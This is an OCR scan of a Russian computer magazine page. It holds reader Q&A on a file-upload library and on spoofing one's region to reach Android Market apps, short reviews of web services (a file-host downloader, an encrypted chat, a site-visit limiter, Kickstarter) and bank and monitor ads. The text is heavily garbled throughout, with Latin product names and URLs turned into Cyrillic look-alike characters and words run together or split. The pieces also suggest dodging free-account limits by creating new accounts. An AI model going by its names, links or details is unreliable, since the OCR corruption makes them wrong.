писать неохота, подскажите наиболее 
универсальное решение, которое точно 
бы работало в любом современном 
браузере. 

А: Хорошее решение — использовать 
библиотеку Ріиріоаб ( ѵѵѵѵѵѵ.ріиріоаб.сот ). 
которая поддерживает массу фишек вроде 
загрузки файлов кусочками, бгад’п’сігор, 
передачи нескольких документов одно- 
временно, красивого отображения хода 
загрузки и т.д. 

Для передачи данных используются разные 
технологии, втом числе, конечноже, НТМБ5. 
Если у пользователя браузер не поддержи- 
вает новшества НТМІ_, библиотека автома- 
тически использует другой способ загрузки: 
ЕІазЬ, беагз, ЗіІѵегІідЫ, ВгоѵѵзегРІиз или 
НТМБ4. Причем приоритет способов загруз- 
ки можно изменить в конфиге. 

О: Наткнулся в Сети на интересный стар- 
тап, который помимо веб-интерфейса 
предлагает воспользоваться приложе- 
нием для платформы АпбгоісІ. Но хоть 
убей не могу понять: в моем АпбгоісІ 
МагкеГе такого приложения нет! 

Как это может быть? 

А: Очень просто. Дело в том, что каждый 
разработчик при добавлении приложения 
в Ап б го і б Магкеі выбирает, для каких ре- 
гионов оно будет доступно. И очень часто 
случается так, что в нашем российском 
АпбгоісІ Магкеі’е некоторых интересных 
разработок не оказывается. К счастью, 
можно проспуфить используемый регион и 
таким образом достучаться до магазинов 
приложений других стран. Проще всего 
это сделать с помощью утилиты Магкеі 
е п а Ые г ( сосІе.доодІе.сот/р/тагкеІ-епаЫег ) . 
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РЕТСН.Ю 

ІеІсЫо 

©О том, сколько времени придется подождать и сколько денег придется 
заплатитьза рекламу, прежде чем загрузить файл с файлообменника 
вроде РарісІзЬаге, рассказывать не надо. Если речь идето несколь- 
ких больших файлах (например, разбитом на 100- мега байтные части 
образе какого-то диска], то легче сразу пристрел иться. Конечно, есть 
программы вроде ОРоѵѵпІоасІег Цсіоѵѵпіоасіег.огд ], которыетерпеливо 
подождут окончания всехтаймеров и даже попробуют сами распознать 
и ввести САРТСНА, чтобы скачать файл, но это лишь частично облегчает 
жизнь. Теперьже есть 1 00%-ное лекарство. Сервис беІісЬ. іо быстро (оче- 
видно, с использованием платных Ргетіит-аккаунтов] выкачает для 
тебя файлы с различных файлообменников (РезрозКбІез, Рарісізбаге, 
Медаііріоасі и т.п.) и даже Р2Р-сетей (пока только ВИТоггепі] и предо- 
ставит их для загрузки на очень быстром канале. Количество гигабайт, 
которые можно скачать на бесплатном аккаунте, ограничено, но за 
созданием новыхучеток никто не следит. 



СКѴРТОСАТ 

сгѵріо.саі 

О Приватность общения — один из ключевых вопросов безопасности 
в инете. Пока гики прикручивают к своим мессенджерам плагины для 
шифрования через специально созданный протокол ОТР (ООЧЬе- 
РесогсІ), создатели сервиса сгуріосаі предлагают всем простой, но в то 
же время надежный способ безопасно чатиться в Сети. Идея заклю- 
чается в симметричном шифровании сообщений на стороне клиента 
(с использованием ^ѵаЗсгірІ и браузера]. Уходящие в чат-комнату 
сообщения предварительно шифруются с использованием АЕ5-256 и 
указанного пользователем ключа. Другиеучастники разговора смогут 
прочитать их, только если сами правильно введуттотже самый ключ. Пе- 
реписка надежно удаляется через 30 ми нут отсутствия активности, а сам 
сервис работаете постоянным 55Е-шифрованием. Если не доверяешь 
владельцам сгурІюсаСто можешьсам поднять подобный сервис, пред- 
варительно изучив исходники с біШиЬ ( дііЬиЬ.сот/каерога/сгурІосаІ: ]. 
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Для ограничения посещений 


— 


определенных сайтов 




Площадка для 
обсуждениям 
пожертвования 
денег на самые 
разные проекты 



КЕЕРМЕОІІТ! КІСК5ТАКТЕК 

кеертеоиі.сот ѵѵѵѵѵѵ.кіскзіагіег.сот 



©Если сосчитать все то количество времени, которое мы проводим в 
социальных сетях за год, можно только удивляться, сколько строчек кода 
можно было написать и новых иностранных слов выучить. Ограничить 
тупое времяпрепровождение в ЕасеЬоок’е, в контакте и вообще на 
любых сайтах, которые многие посещаютуже по какой-то дебильной 
привычке, призван проект КеерМеОиЛ. Для каждого такого ресурса он 
создает закладку, которая выступает вроде своеобразной прокси. Когда 
ты пробуешь зайти на сайт через такой букмарк, КеерМеОиЛ проверяет, 
не было ли на него посещений втечение последнихбО минут. Если свой 
лимит исчерпал, то вместо целевой страницы тебе отобразится нагляд- 
ная статистика и графики посещений этого ресурса. Включи силу воли и 
не заходи на нужный сайт напрямую. Кстати, сайт ѵкопіакіе.ги занимает 
в хитпараде КеерМеОиЛ почетное 6-е место. 



©Это не какой-то полезный сервис, нет. Это площадка, где ты можешь 
найти поддержку для любой, пускай даже самой безумной идеи. Замечу, 
поддержку не абы какую, а самую важную — финансовую! Любой человек 
может выложить описание проекта в одной из категорий (музыка, фильм, 
искусство, технология, дизайн, еда, публикации] и обозначить количе- 
ство денежных средств, которые ему необходимо для его реализации. 
Сайт имеетогромную аудиториютак называемых бейкеров, которые 
активно поддерживают проект рублем или, вернее говоря, баксами. 

В некоторых случаях активность зашкаливает. Например, для про- 
екта по созданию ультра яр ко го фонаря с невероятной силой светового 
потока 500 люменов ( ѵѵѵѵѵѵ.ЬехЬгідЫ.сопп ] автор ставил целью собрать 
$31 000. Обещанный фонарь в качестве бонуса, однако, привлектакое 
количество желающих поделиться денежками, что в настоящий момент 
собрано пожертвований уже на сумму $259,293. Неплохо, правда? 
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Получать скидки 
в барах, ресторанах и 
магазинах твоего 
города 
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Участвовать в акциях 
и посещать закрытые 
мероприятия для держателей «Мужской Карты» 



Управлять своими счетами, используя систему 
интернет-банка «Альфа-Клик» 

Оформлять подписку на журнал «Хакер» 
со скидкой 50% 

тел. подписки (4951-663-82-77 | 5Ішр.дІсш 

Оформить дебетовую или кредитную «Мужскую карту» можно в отделениях 
ОАО «Альфа-Банка», а так же заказав по телефонам: 

(495) 229-2222 в Москве 1 8-800-333-2-333 в регионах России (звонок бесплатный) 



МАХ1М 



(дате)Іаіиі 



Альфа-Банк 



нУл&СКВД ЖЧРН . аа С чмишн 



ѵлѵѵѵ.тапсагсі.ги 



О «Альфа-Банк*. Генеральная лицензия банка 
банковских операций ет 29.0М& 



и на осуществление 
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327А550Н 



Яркий дизайн в центре внимания 




524А300ВІ- 




327А350Н 



!_=□ мониторы Затзипд 

• Разрешение РиІІНО 

• Время отклика 2 мс (ОЮ)* 

• Контрастность МЕОА ДСП 

• Малое энергопотребление 

• Датчик яркости 

• Датчик присутствия пользователя** 

• кроме моделей 5А300 **только для моделей ЗА550 



Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), 
ш/ѵѵ. затзипд. сот. Товар сертифицирован. Реклама. 






